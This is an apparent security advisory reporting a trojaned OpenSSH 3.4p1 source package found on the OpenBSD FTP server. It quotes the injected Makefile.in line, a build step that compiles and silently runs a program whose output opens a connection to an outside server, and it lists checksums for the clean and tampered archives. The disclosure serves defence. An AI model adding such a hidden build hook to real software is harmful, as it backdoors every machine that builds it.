A Trojaned version of OpenSSH package has been found to reside on ftp.openbsd.org's server. The Trojaned version allows remote attackers to completely compromise the security of the server running the Trojaned copy.
The information has been provided by Edwin Groothuis.
The following OpenSSH package found on ftp.openbsd.org (and probably all its mirrors now) has been found to beTrojaned:
The OpenBSD people have been informed about it (via email to firstname.lastname@example.org and via irc.openprojects.org/#openbsd)
The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
bf-test.c is nothing more than a wrapper that generates a shell-script that compiles itself and tries to connect to an server running on 126.96.36.199:6667 (web.snsonline.net).
The following are links to sources of the malicious files:
This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system:
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
This is the md5 checksum of the Trojaned openssh-3.4p1.tar.gz:
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
comments powered by Disqus. blog comments powered by